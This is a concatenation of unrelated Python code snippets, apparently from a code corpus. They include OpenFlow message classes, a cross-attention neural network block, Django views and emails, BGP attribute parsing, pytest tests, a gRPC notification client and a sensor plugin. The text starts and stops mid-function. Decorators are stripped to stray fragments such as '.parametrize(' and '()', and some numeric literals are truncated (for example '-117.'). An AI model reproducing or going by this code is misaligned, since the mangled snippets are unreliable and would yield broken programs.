(_version == 5) _type = reader.read('!B')[0] assert (_type == 34) _length = reader.read('!H')[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.xid = reader.read('!L')[0] obj.bundle_id = reader.read('!L')[0] reader.skip(2) obj.flags = reader.read('!H')[0] obj.data = str(reader.read_all()) return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.xid != other.xid): return False if (self.bundle_id != other.bundle_id): return False if (self.flags != other.flags): return False if (self.data != other.data): return False return True def pretty_print(self, q): q.text('bundle_add_msg {') with q.group(): with q.indent(2): q.breakable() q.text('xid = ') if (self.xid != None): q.text(('%#x' % self.xid)) else: q.text('None') q.text(',') q.breakable() q.text('bundle_id = ') q.text(('%#x' % self.bundle_id)) q.text(',') q.breakable() q.text('flags = ') value_name_map = {1: 'OFPBF_ATOMIC', 2: 'OFPBF_ORDERED'} q.text(util.pretty_flags(self.flags, value_name_map.values())) q.text(',') q.breakable() q.text('data = ') q.pp(self.data) q.breakable() q.text('}')
class TProtocolNoCtDialogue(Dialogue): INITIAL_PERFORMATIVES: FrozenSet[Message.Performative] = frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_PT}) TERMINAL_PERFORMATIVES: FrozenSet[Message.Performative] = frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O}) VALID_REPLIES: Dict[(Message.Performative, FrozenSet[Message.Performative])] = {TProtocolNoCtMessage.Performative.PERFORMATIVE_EMPTY_CONTENTS: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_EMPTY_CONTENTS}), TProtocolNoCtMessage.Performative.PERFORMATIVE_MT: frozenset(), TProtocolNoCtMessage.Performative.PERFORMATIVE_O: frozenset(), TProtocolNoCtMessage.Performative.PERFORMATIVE_PCT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O}), TProtocolNoCtMessage.Performative.PERFORMATIVE_PMT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_MT, TProtocolNoCtMessage.Performative.PERFORMATIVE_O}), TProtocolNoCtMessage.Performative.PERFORMATIVE_PT: frozenset({TProtocolNoCtMessage.Performative.PERFORMATIVE_PT, TProtocolNoCtMessage.Performative.PERFORMATIVE_PCT, TProtocolNoCtMessage.Performative.PERFORMATIVE_PMT})} class Role(Dialogue.Role): ROLE_1 = 'role_1' ROLE_2 = 'role_2' class EndState(Dialogue.EndState): END_STATE_1 = 0 END_STATE_2 = 1 END_STATE_3 = 2 def __init__(self, dialogue_label: DialogueLabel, self_address: Address, role: Dialogue.Role, message_class: Type[TProtocolNoCtMessage]=TProtocolNoCtMessage) -> None: Dialogue.__init__(self, dialogue_label=dialogue_label, message_class=message_class, self_address=self_address, role=role)
class CrossAttentionBlock(Chain): def __init__(self, embedding_dim: int, context_embedding_dim: int, context_key: str, num_heads: int=1, use_bias: bool=True, device: ((Device | str) | None)=None, dtype: (DType | None)=None) -> None: self.embedding_dim = embedding_dim self.context_embedding_dim = context_embedding_dim self.context = 'cross_attention_block' self.context_key = context_key self.num_heads = num_heads self.use_bias = use_bias super().__init__(Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), SelfAttention(embedding_dim=embedding_dim, num_heads=num_heads, use_bias=use_bias, device=device, dtype=dtype)), Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), Parallel(Identity(), UseContext(context=self.context, key=context_key), UseContext(context=self.context, key=context_key)), Attention(embedding_dim=embedding_dim, num_heads=num_heads, key_embedding_dim=context_embedding_dim, value_embedding_dim=context_embedding_dim, use_bias=use_bias, device=device, dtype=dtype)), Residual(LayerNorm(normalized_shape=embedding_dim, device=device, dtype=dtype), Linear(in_features=embedding_dim, out_features=((2 * 4) * embedding_dim), device=device, dtype=dtype), GLU(GeLU()), Linear(in_features=(4 * embedding_dim), out_features=embedding_dim, device=device, dtype=dtype)))
def weekly_reminder_email(user, event_list, location): profile_url = urlresolvers.reverse('user_detail', args=(user.username,)) location_name = location.name current_tz = timezone.get_current_timezone() today_local = timezone.now().astimezone(current_tz).date() tomorrow_local = (today_local + datetime.timedelta(days=1)) week_name = tomorrow_local.strftime('%B %d, %Y') footer = ('You are receiving this email because you requested weekly updates of upcoming events from %s. To turn them off, visit %s' % (location_name, profile_url)) sender = location.from_email() subject = ((('[' + location.email_subject_prefix) + ']') + (' Upcoming events for the week of %s' % week_name)) current_tz = timezone.get_current_timezone() today_local = timezone.now().astimezone(current_tz).date() plaintext = get_template('emails/events_this_week.txt') htmltext = get_template('emails/events_this_week.html') domain = Site.objects.get_current().domain c_text = {'user': user, 'events': event_list, 'location_name': location_name, 'location': location, 'domain': domain, 'footer': footer, 'week_name': week_name} text_content = plaintext.render(c_text) c_html = {'user': user, 'events': event_list, 'location_name': location_name, 'location': location, 'domain': domain, 'footer': footer, 'week_name': week_name} html_content = htmltext.render(c_html) mailgun_data = {'from': sender, 'to': user.email, 'subject': subject, 'text': text_content, 'html': html_content} return mailgun_send(mailgun_data)
def Home(request): recommend = Recommend.objects.filter(is_recommend=True)[:10] qq = QQ.objects.all() links = link.objects.all() try: page = request.GET.get('page', 1) if (page == ''): page = 1 except PageNotAnInteger: page = request.GET.get('page') dynamicList = dynamic.objects.filter(is_delete=False)[:500] dynamicPage = Paginator(dynamicList, 10, request=request).page(page) banners = Banners.objects.first() return render(request, 'pc/index.html', {'dynamicPage': dynamicPage})
class TableFilter(HasPrivateTraits): name = Str('Default filter') _name = Str('Default filter') desc = Str('All items') allowed = Callable((lambda object: True), transient=True) template = Bool(False) ignored_traits = ['_name', 'template', 'desc'] traits_view = View('name{Filter name}', '_', Include('filter_view'), title='Edit Filter', width=0.2, buttons=['OK', 'Cancel', Action(name='Help', action='show_help', defined_when="ui.view_elements.content['filter_view'].help_id != ''")]) searchable_view = View([[Include('search_view'), '|[]'], ['handler.status~', '|[]<>'], ['handler.find_next`Find the next matching item`', 'handler.find_previous`Find the previous matching item`', 'handler.select`Select all matching items`', 'handler.OK`Exit search`', '-<>'], '|<>'], title='Search for', kind='livemodal', width=0.25) search_view = Group(Include('filter_view')) filter_view = Group() def filter(self, object): return self.allowed(object) def description(self): return self.desc def edit(self, object): return self.edit_traits(view=self.edit_view(object), kind='livemodal') def edit_view(self, object): return None def __str__(self): return self.name def _anytrait_changed(self, name, old, new): if ((name not in self.ignored_traits) and ((self.name == self._name) or (self.name == ''))): self.name = self._name = self.description()
.parametrize('missing_arg, expected_warning', [('ncol', 'ncol is a required argument'), ('nrow', 'nrow is a required argument'), ('nlay', 'nlay is a required argument'), ('xinc', 'xinc is a required argument'), ('yinc', 'yinc is a required argument'), ('zinc', 'zinc is a required argument')]) def test_default_init_deprecation(missing_arg, expected_warning): input_args = {'ncol': 10, 'nrow': 10, 'nlay': 2, 'xinc': 10.0, 'yinc': 10.0, 'zinc': 1.0} input_args.pop(missing_arg) with pytest.warns(DeprecationWarning, match=expected_warning) as record: xtgeo.Cube(**input_args) assert (len(record) == 1)
class DateBetweenFilter(BaseSQLAFilter, filters.BaseDateBetweenFilter): def __init__(self, column, name, options=None, data_type=None): super(DateBetweenFilter, self).__init__(column, name, options, data_type='daterangepicker') def apply(self, query, value, alias=None): (start, end) = value return query.filter(self.get_column(alias).between(start, end))
_PathAttribute.register_type(BGP_ATTR_TYPE_COMMUNITIES) class BGPPathAttributeCommunities(_PathAttribute): _VALUE_PACK_STR = '!I' _ATTR_FLAGS = (BGP_ATTR_FLAG_OPTIONAL | BGP_ATTR_FLAG_TRANSITIVE) NO_EXPORT = int('0xFFFFFF01', 16) NO_ADVERTISE = int('0xFFFFFF02', 16) NO_EXPORT_SUBCONFED = int('0xFFFFFF03', 16) WELL_KNOW_COMMUNITIES = (NO_EXPORT, NO_ADVERTISE, NO_EXPORT_SUBCONFED) def __init__(self, communities, flags=0, type_=None, length=None): super(BGPPathAttributeCommunities, self).__init__(flags=flags, type_=type_, length=length) self.communities = communities def parse_value(cls, buf): rest = buf communities = [] elem_size = struct.calcsize(cls._VALUE_PACK_STR) while (len(rest) >= elem_size): (comm,) = struct.unpack_from(cls._VALUE_PACK_STR, six.binary_type(rest)) communities.append(comm) rest = rest[elem_size:] return {'communities': communities} def serialize_value(self): buf = bytearray() for comm in self.communities: bincomm = bytearray() msg_pack_into(self._VALUE_PACK_STR, bincomm, 0, comm) buf += bincomm return buf def is_no_export(comm_attr): return (comm_attr == BGPPathAttributeCommunities.NO_EXPORT) def is_no_advertise(comm_attr): return (comm_attr == BGPPathAttributeCommunities.NO_ADVERTISE) def is_no_export_subconfed(comm_attr): return (comm_attr == BGPPathAttributeCommunities.NO_EXPORT_SUBCONFED) def has_comm_attr(self, attr): for comm_attr in self.communities: if (comm_attr == attr): return True return False
def test_arg_botcmd_returns_with_escaping(dummy_backend): first_name = 'Err\\"' last_name = 'Bot' dummy_backend.callback_message(makemessage(dummy_backend, ('!returns_first_name_last_name --first-name=%s --last-name=%s' % (first_name, last_name)))) assert ('Err" Bot' == dummy_backend.pop_message().body)
class TestMultiMetaMatcher(TestMetaMatcherClasses): def test_true(self): matcher = ([self._Matcher(True)] * 10) matcher = search._MultiMetaMatcher(matcher) assert matcher.match('foo') def test_false(self): matcher = (([self._Matcher(True)] * 10) + [self._Matcher(False)]) matcher = search._MultiMetaMatcher(matcher) assert (not matcher.match('foo'))
.parametrize('password, expected', [('Testpassword1!', 'Testpassword1!'), (str_to_b64_str('Testpassword1!'), 'Testpassword1!')]) def test_user_create(password, expected): user = UserCreate(username='immauser', password=password, first_name='imma', last_name='user') assert (user.password == expected)
class EmbeddedNotificationClient(NotificationClient): def __init__(self, server_uri: str, namespace: str=None, sender: str=None, client_id: int=None, initial_seq_num: int=None): super().__init__(namespace, sender) self.server_uri = server_uri channel = grpc.insecure_channel(target=self.server_uri, options=[('grpc.max_receive_message_length', (- 1))]) self.notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel) self.threads = {} self.lock = threading.Lock() self._client_id = client_id self._initial_seq_num = initial_seq_num self.list_member_interval_ms = 1000 self.retry_interval_ms = 1000 self.retry_timeout_ms = 10000 server_uri_list = self.server_uri.split(',') if (len(server_uri_list) > 1): self.living_members = [] self.current_uri = None last_error = None for server_uri in server_uri_list: channel = grpc.insecure_channel(server_uri) notification_stub = notification_service_pb2_grpc.NotificationServiceStub(channel) try: request = ListMembersRequest(timeout_seconds=0) response = notification_stub.listMembers(request) if (response.return_code == ReturnStatus.SUCCESS): self.living_members = [proto_to_member(proto).server_uri for proto in response.members] else: raise Exception(response.return_msg) self.current_uri = server_uri self.notification_stub = notification_stub break except grpc.RpcError as e: last_error = e if (self.current_uri is None): raise Exception('No available server uri!') from last_error self.ha_change_lock = threading.Lock() self.ha_running = True self.notification_stub = self._wrap_rpcs(self.notification_stub, server_uri) self.list_member_thread = threading.Thread(target=self._list_members, daemon=True) self.list_member_thread.start() if (self._client_id is None): request = RegisterClientRequest(client_meta=ClientMeta(namespace=self.namespace, sender=self.sender)) response = self.notification_stub.registerClient(request) if (response.return_code == ReturnStatus.SUCCESS): self._client_id = response.client_id else: raise Exception(response.return_msg) else: request = ClientIdRequest(client_id=self._client_id) response = self.notification_stub.isClientExists(request) if (response.return_code != ReturnStatus.SUCCESS): raise Exception('Failed to close notification client: {}'.format(self)) elif (not response.is_exists): raise Exception('Init notification client with a client id which have not registered.') seq_num = (0 if (self._initial_seq_num is None) else int(self._initial_seq_num)) self.sequence_num_manager = SequenceNumberManager(seq_num) def _ha_wrapper(self, func): (func) def call_with_retry(*args, **kwargs): current_func = getattr(self.notification_stub, func.__name__).inner_func start_time = (time.time_ns() / 1000000) failed_members = set() while True: try: return current_func(*args, **kwargs) except grpc.RpcError: logging.error('Exception thrown when calling rpc, change the connection.', exc_info=True) with self.ha_change_lock: if (current_func.server_uri == self.current_uri): living_members = list(self.living_members) failed_members.add(self.current_uri) shuffle(living_members) found_new_member = False for server_uri in living_members: if (server_uri in failed_members): continue next_uri = server_uri channel = grpc.insecure_channel(next_uri) notification_stub = self._wrap_rpcs(notification_service_pb2_grpc.NotificationServiceStub(channel), next_uri) self.notification_stub = notification_stub current_func = getattr(self.notification_stub, current_func.__name__).inner_func self.current_uri = next_uri found_new_member = True if (not found_new_member): logging.error('No available living members currently. Sleep and retry.') failed_members.clear() sleep_and_detecting_running(self.retry_interval_ms, (lambda : self.ha_running)) if ((not self.ha_running) or ((time.time_ns() / 1000000) > (start_time + self.retry_timeout_ms))): if (not self.ha_running): raise Exception('HA has been disabled.') else: raise Exception('Rpc retry timeout!') call_with_retry.inner_func = func return call_with_retry def _wrap_rpcs(self, stub, server_uri): for (method_name, method) in dict(stub.__dict__).items(): method.__name__ = method_name method.server_uri = server_uri setattr(stub, method_name, self._ha_wrapper(method)) return stub def _list_members(self): while self.ha_running: request = ListMembersRequest(timeout_seconds=int((self.list_member_interval_ms / 1000))) response = self.notification_stub.listMembers(request) if (response.return_code == ReturnStatus.SUCCESS): with self.ha_change_lock: self.living_members = [proto_to_member(proto).server_uri for proto in response.members] else: logging.error(('Exception thrown when updating the living members: %s' % response.return_msg)) time.sleep(int((self.list_member_interval_ms / 1000))) def disable_high_availability(self): if hasattr(self, 'ha_running'): self.ha_running = False self.list_member_thread.join() def close(self): if (self._client_id is not None): request = ClientIdRequest(client_id=self._client_id) response = self.notification_stub.deleteClient(request) if (response.return_code != ReturnStatus.SUCCESS): raise Exception('Failed to close notification client: {}'.format(self)) logging.info('The notification client:{} has been closed.'.format(self)) def client_id(self): return self._client_id def sequence_number(self): return self.sequence_num_manager.get_sequence_number() def send_event(self, event: Event): seq_num = self.sequence_num_manager.get_sequence_number() signature = '_'.join(['client', str(self._client_id), str(seq_num)]) request = SendEventRequest(event=EventProto(key=event.key, value=event.value, context=event.context, namespace=self.namespace, sender=self.sender), uuid=signature, enable_idempotence=True) response = self.notification_stub.sendEvent(request) if (response.return_code == ReturnStatus.SUCCESS): self.sequence_num_manager.increment_sequence_number() return event_proto_to_event(response.event) else: raise Exception(response.return_msg) def register_listener(self, listener_processor: ListenerProcessor, event_keys: List[str]=None, offset: int=None) -> ListenerRegistrationId: def list_events_from_offset(client, v, timeout_seconds: int=None): request = ListAllEventsRequest(start_offset=v, timeout_seconds=timeout_seconds) response = client.notification_stub.listAllEvents(request) if (response.return_code == ReturnStatus.SUCCESS): if (response.events is None): return None else: events = [] for event_proto in response.events: event = event_proto_to_event(event_proto) events.append(event) return events else: raise Exception(response.return_msg) def listen(client, v, p): t = threading.current_thread() current_offset = (0 if (v is None) else v) try: while getattr(t, '_flag', True): notifications = list_events_from_offset(client, current_offset, NOTIFICATION_TIMEOUT_SECONDS) if (len(notifications) > 0): if (event_keys is not None): events = client.filter_events(event_keys=event_keys, events=notifications) else: events = notifications p.process(events) current_offset = notifications[(len(notifications) - 1)].offset except Exception as e: logging.exception('Exception when listening events, %s', e) raise e thread = threading.Thread(target=listen, args=(self, offset, listener_processor), daemon=True) thread.start() self.lock.acquire() try: self.threads[thread.__hash__()] = thread finally: self.lock.release() return ListenerRegistrationId(id=str(thread.__hash__())) def unregister_listener(self, registration_id: ListenerRegistrationId): self.lock.acquire() key = int(registration_id.id) try: if (key in self.threads): thread = self.threads[key] thread._flag = False thread.join() del self.threads[key] finally: self.lock.release() def list_all_events(self, start_time: int=None, start_offset: int=None, end_offset: int=None) -> List[Event]: request = ListAllEventsRequest(start_time=start_time, start_offset=start_offset, end_offset=end_offset) response = self.notification_stub.listAllEvents(request) if (response.return_code == ReturnStatus.SUCCESS): if (response.events is None): return [] else: events = [] for event_proto in response.events: event = event_proto_to_event(event_proto) events.append(event) return events else: raise Exception(response.return_msg) def list_events(self, key: str=None, namespace: str=None, sender: str=None, begin_offset: int=None, end_offset: int=None) -> List[Event]: request = ListEventsRequest(key=key, namespace=namespace, sender=sender, start_offset=begin_offset, end_offset=end_offset) response = self.notification_stub.listEvents(request) if (response.return_code == ReturnStatus.SUCCESS): if (response.events is None): return [] else: events = [] for event_proto in response.events: event = event_proto_to_event(event_proto) events.append(event) return events else: raise Exception(response.return_msg) def time_to_offset(self, time: datetime) -> int: timestamp = int((time.timestamp() * 1000)) request = TimeToOffsetRequest(timestamp=timestamp) response = self.notification_stub.timestampToEventOffset(request) return response.offset def count_events(self, key: str=None, namespace: str=None, sender: str=None, begin_offset: int=None, end_offset: int=None) -> Tuple[(int, List[SenderEventCount])]: request = CountEventsRequest(key=key, namespace=namespace, sender=sender, start_offset=begin_offset, end_offset=end_offset) response = self.notification_stub.countEvents(request) if (response.return_code == ReturnStatus.SUCCESS): sender_event_counts = [] for sender_event_count_proto in response.sender_event_counts: sender_event_count = event_count_proto_to_event_count(sender_event_count_proto) sender_event_counts.append(sender_event_count) return (response.event_count, sender_event_counts) else: raise Exception(response.return_msg) def filter_events(self, event_keys: List[str], events: List[Event]) -> List[Event]: def match(key, namespace, event: Event) -> bool: if ((key is not None) and (key != event.key)): return False if ((namespace is not None) and (namespace != event.namespace)): return False return True results = [] for e in events: for k in event_keys: if match(k, self.namespace, e): results.append(e) break return results
class OptionSeriesColumnrangeSonificationTracksActivewhen(Options): def crossingDown(self): return self._config_get(None) def crossingDown(self, num: float): self._config(num, js_type=False) def crossingUp(self): return self._config_get(None) def crossingUp(self, num: float): self._config(num, js_type=False) def max(self): return self._config_get(None) def max(self, num: float): self._config(num, js_type=False) def min(self): return self._config_get(None) def min(self, num: float): self._config(num, js_type=False) def prop(self): return self._config_get(None) def prop(self, text: str): self._config(text, js_type=False)
def get_episodes(html, url): s = [] for match in re.finditer('<li>\\s*<a href="(/m\\d+/)"[^>]*>(.+?)</a>', html, re.DOTALL): (ep_url, title) = match.groups() s.append(Episode(clean_tags(title), urljoin(url, ep_url))) if ('DM5_COMIC_SORT=1' in html): return s return s[::(- 1)]
class echo_request(message): version = 6 type = 2 def __init__(self, xid=None, data=None): if (xid != None): self.xid = xid else: self.xid = None if (data != None): self.data = data else: self.data = '' return def pack(self): packed = [] packed.append(struct.pack('!B', self.version)) packed.append(struct.pack('!B', self.type)) packed.append(struct.pack('!H', 0)) packed.append(struct.pack('!L', self.xid)) packed.append(self.data) length = sum([len(x) for x in packed]) packed[2] = struct.pack('!H', length) return ''.join(packed) def unpack(reader): obj = echo_request() _version = reader.read('!B')[0] assert (_version == 6) _type = reader.read('!B')[0] assert (_type == 2) _length = reader.read('!H')[0] orig_reader = reader reader = orig_reader.slice(_length, 4) obj.xid = reader.read('!L')[0] obj.data = str(reader.read_all()) return obj def __eq__(self, other): if (type(self) != type(other)): return False if (self.xid != other.xid): return False if (self.data != other.data): return False return True def pretty_print(self, q): q.text('echo_request {') with q.group(): with q.indent(2): q.breakable() q.text('xid = ') if (self.xid != None): q.text(('%#x' % self.xid)) else: q.text('None') q.text(',') q.breakable() q.text('data = ') q.pp(self.data) q.breakable() q.text('}')
class TopicFactory(factory.django.DjangoModelFactory): forum = factory.SubFactory(ForumFactory) poster = factory.SubFactory(UserFactory) status = Topic.TOPIC_UNLOCKED subject = factory.LazyAttribute((lambda t: faker.text(max_nb_chars=200))) slug = factory.LazyAttribute((lambda t: slugify(t.subject))) class Meta(): model = Topic
class Plugin(plugin.PluginProto): PLUGIN_ID = 28 PLUGIN_NAME = 'Environment - BMP280/BME280' PLUGIN_VALUENAME1 = 'Temperature' PLUGIN_VALUENAME2 = 'Humidity' PLUGIN_VALUENAME3 = 'Pressure' def __init__(self, taskindex): plugin.PluginProto.__init__(self, taskindex) self.dtype = rpieGlobals.DEVICE_TYPE_I2C self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM_BARO self.readinprogress = 0 self.valuecount = 3 self.senddataoption = True self.timeroption = True self.timeroptional = False self.formulaoption = True self._nextdataservetime = 0 self.bme = None self.hashumidity = False def plugin_init(self, enableplugin=None): plugin.PluginProto.plugin_init(self, enableplugin) self.uservar[0] = 0 self.uservar[1] = 0 self.uservar[2] = 0 sensoraddress = int(self.taskdevicepluginconfig[0]) if (self.enabled and (sensoraddress in [118, 119])): try: self.bme = None try: i2cl = self.i2c except: i2cl = (- 1) i2cbus = gpios.HWPorts.i2c_init(i2cl) if (i2cl == (- 1)): i2cbus = gpios.HWPorts.i2cbus self.bme = Bme280(i2c_bus=i2cbus, sensor_address=sensoraddress) if ((self.bme is not None) and (i2cbus is not None) and self.bme.init): if (self.interval > 2): nextr = (self.interval - 2) else: nextr = self.interval self._lastdataservetime = (rpieTime.millis() - (nextr * 1000)) else: misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, 'BME through I2C can not be initialized!') self.initialized = False except Exception as e: misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, str(e)) self.initialized = False if self.enabled: chiptype = self.bme.get_chip_id() self.hashumidity = False chipname = 'Unknown' if (chiptype == 96): chipname = 'BME280' self.hashumidity = True self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_HUM_BARO elif (chiptype in [86, 87, 88]): chipname = 'BMP280' self.vtype = rpieGlobals.SENSOR_TYPE_TEMP_EMPTY_BARO misc.addLog(rpieGlobals.LOG_LEVEL_INFO, ((((chipname + ' (') + str(chiptype)) + ') initialized, Humidity: ') + str(self.hashumidity))) def webform_load(self): choice1 = self.taskdevicepluginconfig[0] options = ['0x76', '0x77'] optionvalues = [118, 119] webserver.addFormSelector('Address', 'plugin_028_addr', 2, options, optionvalues, None, int(choice1)) webserver.addFormNote("Enable <a href='pinout'>I2C bus</a> first, than <a href='i2cscanner'>search for the used address</a>!") return True def webform_save(self, params): initpar = self.taskdevicepluginconfig[0] par = webserver.arg('plugin_028_addr', params) if (par == ''): par = 0 self.taskdevicepluginconfig[0] = int(par) if (initpar != self.taskdevicepluginconfig[0]): try: self.plugin_init() except: pass return True def plugin_read(self): result = False if (self.initialized and (self.readinprogress == 0) and self.enabled): self.readinprogress = 1 (temp, press, hum) = self.bme.get_data() self.set_value(1, temp, False) self.set_value(2, hum, False) self.set_value(3, press, False) self.plugin_senddata() self._lastdataservetime = rpieTime.millis() result = True self.readinprogress = 0 return result
class ParseConditionTuple(NamedTuple): type: Union[(Literal[ParseType.PRECONDITION], Literal[ParseType.POSTCONDITION])] caller: str caller_port: str filename: str callee: str callee_port: str callee_location: SourceLocation leaves: List[ParseLeaf] type_interval: Optional[ParseTypeInterval] features: List[ParseTraceFeature] titos: Iterable[SourceLocation] annotations: Iterable[ParseTraceAnnotation] def interned(self) -> 'ParseConditionTuple': return ParseConditionTuple(type=self.type, caller=sys.intern(self.caller), caller_port=sys.intern(self.caller_port), filename=sys.intern(self.filename), callee=sys.intern(self.callee), callee_port=sys.intern(self.callee_port), callee_location=self.callee_location, leaves=intern_leaves(self.leaves), type_interval=self.type_interval, features=list(map(ParseTraceFeature.interned, self.features)), titos=self.titos, annotations=self.annotations)
() ('--contracts', help='Contracts to lookup', required=False, callback=_arg_split) ('--market', help='Market to lookup', callback=partial(click_validate_enum, Market), required=False) ('--timeframe', help='Timeframe to use (DAILY, HOURLY, MINUTES30 etc)', default=Timeframe.DAILY.name, callback=partial(click_validate_enum, Timeframe), required=False) ('--destdir', help='Destination directory name', required=True, type=click.Path(exists=True, file_okay=False, writable=True, resolve_path=True)) ('--skiperr', help='Continue if a download error occurs. False by default', required=False, default=True, type=bool) ('--lineterm', help='Line terminator', default='\r\n') ('--delay', help='Seconds to sleep between requests', type=click.IntRange(0, 600), default=1) ('--startdate', help='Start date', type=Datetime(format='%Y-%m-%d'), default='2007-01-01', required=False) ('--enddate', help='End date', type=Datetime(format='%Y-%m-%d'), default=datetime.date.today().strftime('%Y-%m-%d'), required=False) ('--ext', help='Resulting file extension', default='csv') def main(contracts, market, timeframe, destdir, lineterm, delay, startdate, enddate, skiperr, ext): exporter = Exporter() if (not any((contracts, market))): raise click.BadParameter('Neither contracts nor market is specified') market_filter = dict() if market: market_filter.update(market=Market[market]) if (not contracts): contracts = exporter.lookup(**market_filter)['code'].tolist() for contract_code in contracts: logging.info('Handling {}'.format(contract_code)) try: contracts = exporter.lookup(code=contract_code, **market_filter) except FinamObjectNotFoundError: logger.error('unknown contract "{}"'.format(contract_code)) sys.exit(1) else: contract = contracts.reset_index().iloc[0] logger.info(u'Downloading contract {}'.format(contract)) try: data = exporter.download(contract.id, start_date=startdate, end_date=enddate, timeframe=Timeframe[timeframe], market=Market(contract.market)) except FinamExportError as e: if skiperr: logger.error(repr(e)) continue else: raise destpath = os.path.join(destdir, '{}-{}.{}'.format(contract.code, timeframe, ext)) data.to_csv(destpath, index=False, line_terminator=lineterm) if (delay > 0): logger.info('Sleeping for {} second(s)'.format(delay)) time.sleep(delay)
class TestAPIOrgLocationViews(TestCase): fixtures = ['orgs', 'practices'] api_prefix = '/api/1.0' def test_api_view_org_location_all_ccgs(self): url = ('%s/org_location?org_type=ccg&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) self.assertEqual(len(content['features']), 2) coord = content['features'][1]['geometry']['coordinates'][0][0][0] self.assertAlmostEqual(coord[0], (- 117.)) self.assertAlmostEqual(coord[1], 33.) def test_api_view_org_location_all_ccgs_excluding_closed(self): closed = PCT.objects.first() closed.close_date = datetime.date(2001, 1, 1) closed.save() url = ('%s/org_location?org_type=ccg&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) self.assertEqual(len(content['features']), 1) def test_api_view_org_location_ccg_by_code(self): url = ('%s/org_location?org_type=ccg&q=03Q,03V&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) self.assertEqual(len(content['features']), 2) coord = content['features'][0]['geometry']['coordinates'][0][0][0] self.assertAlmostEqual(coord[0], (- 117.)) self.assertAlmostEqual(coord[1], 33.) ((('TRAVIS' in os.environ) and os.environ['TRAVIS']), 'Skipping this test on Travis CI.') def test_api_view_org_location_practice_by_code(self): url = ('%s/org_location?org_type=practice&q=03Q&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) self.assertEqual(len(content['features']), 2) props = content['features'][0]['properties'] self.assertEqual(props['name'], 'AINSDALE VILLAGE SURGERY') self.assertEqual(props['setting'], 4) coord = content['features'][0]['geometry']['coordinates'] self.assertEqual(coord[0], 1.0) self.assertEqual(coord[1], 51.5) def test_api_view_org_location_pcn_by_code(self): url = ('%s/org_location?org_type=pcn&q=PCN0001&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) self.assertEqual(len(content['features']), 1) props = content['features'][0]['properties'] self.assertEqual(props['name'], 'Transformational Sustainability') def test_api_view_org_location_pcn_by_ccg_code(self): url = ('%s/org_location?org_type=pcn&q=03V&format=json' % self.api_prefix) response = self.client.get(url, follow=True) self.assertEqual(response.status_code, 200) content = json.loads(response.content) pcn_codes = {feature['properties']['code'] for feature in content['features']} self.assertEqual(pcn_codes, {'PCN0001', 'PCN0002'})
def test_all_metrics_tested(): load_test_metrics() all_metric_classes = find_all_subclasses(Metric) missing = [] no_datasets = [] for metric_class in all_metric_classes: if (not any(((m.metric.__class__ is metric_class) for m in metric_fixtures))): missing.append(metric_class) else: tms = [tm for tm in metric_fixtures if (tm.metric.__class__ is metric_class)] tests = [] for tm in tms: tests.extend(generate_dataset_outcome(tm)) if (len(tests) == 0): no_datasets.append(metric_class) suggestion_template = '\\ndef {snake_case}():\n return TestMetric("{snake_case}", {cls}())\n ' suggestion = '\n'.join((suggestion_template.format(cls=m.__name__, snake_case=re.sub('(?<!^)(?=[A-Z])', '_', m.__name__).lower()) for m in missing)) imports = '\n'.join(('from {module} import {cls}'.format(cls=m.__name__, module=m.__module__) for m in missing)) print(imports) print(suggestion) assert (len(missing) == 0), f'Missing metric fixtures for {missing}.' no_datasets_str = '\n'.join((mc.__name__ for mc in no_datasets)) assert (len(no_datasets) == 0), f'No datasets configured for metrics {no_datasets_str}'
class Tracer(object): def __init__(self, frames_collector_func, frames_processing_func, queue_func, config, agent: 'elasticapm.Client') -> None: self.config = config self.queue_func = queue_func self.frames_processing_func = frames_processing_func self.frames_collector_func = frames_collector_func self._agent = agent self._ignore_patterns = [re.compile(p) for p in (config.transactions_ignore_patterns or [])] def span_stack_trace_min_duration(self) -> timedelta: if ((self.config.span_stack_trace_min_duration != timedelta(seconds=0.005)) or (self.config.span_frames_min_duration == timedelta(seconds=0.005))): return self.config.span_stack_trace_min_duration else: warnings.warn('`span_frames_min_duration` is deprecated. Please use `span_stack_trace_min_duration`.', DeprecationWarning) if (self.config.span_frames_min_duration < timedelta(seconds=0)): return timedelta(seconds=0) elif (self.config.span_frames_min_duration == timedelta(seconds=0)): return timedelta(seconds=(- 1)) else: return self.config.span_frames_min_duration def begin_transaction(self, transaction_type: str, trace_parent: Optional[TraceParent]=None, start: Optional[float]=None, auto_activate: bool=True, links: Optional[Sequence[TraceParent]]=None) -> Transaction: links = (links if links else []) continuation_strategy = self.config.trace_continuation_strategy if (trace_parent and (continuation_strategy != constants.TRACE_CONTINUATION_STRATEGY.CONTINUE)): if ((continuation_strategy == constants.TRACE_CONTINUATION_STRATEGY.RESTART) or ((continuation_strategy == constants.TRACE_CONTINUATION_STRATEGY.RESTART_EXTERNAL) and (not trace_parent.tracestate_dict))): links.append(trace_parent) trace_parent = None if trace_parent: is_sampled = bool(trace_parent.trace_options.recorded) sample_rate = trace_parent.tracestate_dict.get(constants.TRACESTATE.SAMPLE_RATE) else: is_sampled = ((self.config.transaction_sample_rate == 1.0) or (self.config.transaction_sample_rate > random.random())) if (not is_sampled): sample_rate = '0' else: sample_rate = str(self.config.transaction_sample_rate) transaction = Transaction(self, 